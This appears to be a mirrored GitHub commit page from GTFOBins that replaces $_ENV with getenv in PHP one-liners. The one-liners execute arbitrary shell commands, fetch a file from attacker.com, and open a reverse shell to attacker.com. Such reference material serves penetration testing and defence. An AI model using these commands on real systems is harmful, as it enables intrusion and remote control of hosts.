public-mirrors/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2024-12-26 06:49:44 +01:00
Code Issues Projects Releases Wiki Activity

Use getenv instead of $_ENV in php as it is configuration-dependent

Browse Source
This commit is contained in:
Andrea Cardaci 2018-05-25 11:16:37 +02:00
parent fccea5314e
commit 4ea28f8c48
1 changed files with 8 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
_gtfobins/php.md
View File

@ -3,22 +3,22 @@ functions:
exec-non-interactive:
- code: |
export CMD="ls /"
php -r 'system($_ENV["CMD"]);'
php -r 'system(getenv("CMD"));'
- code: |
export CMD="ls /"
php -r 'passthru($_ENV["CMD"]);'
php -r 'passthru(getenv("CMD"));'
- code: |
export CMD="ls /"
php -r 'print(shell_exec($_ENV["CMD"]));'
php -r 'print(shell_exec(getenv("CMD")));'
- code: |
export CMD="ls /"
php -r '$r=array(); exec($_ENV["CMD"], $r); print(join(\"\\n\",$r));'
php -r '$r=array(); exec(getenv("CMD"), $r); print(join(\"\\n\",$r));'
- code: |
export CMD="ls /"
php -r '$h=@popen($_ENV["CMD"],"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
- code: |
export CMD="ls /"
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open($_ENV["CMD"], $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
upload:
- description: Serve files in the local folder running an HTTP server.
code: |
@ -30,11 +30,11 @@ functions:
code: |-
export URL=http://attacker.com/file_to_get
export LFILE=where_to_save
php -r '$c=file_get_contents($_ENV["URL"]);file_put_contents($_ENV["LFILE"], $c);'
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
php -r '$sock=fsockopen($_ENV["RHOST"],$_ENV["RPORT"]);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
---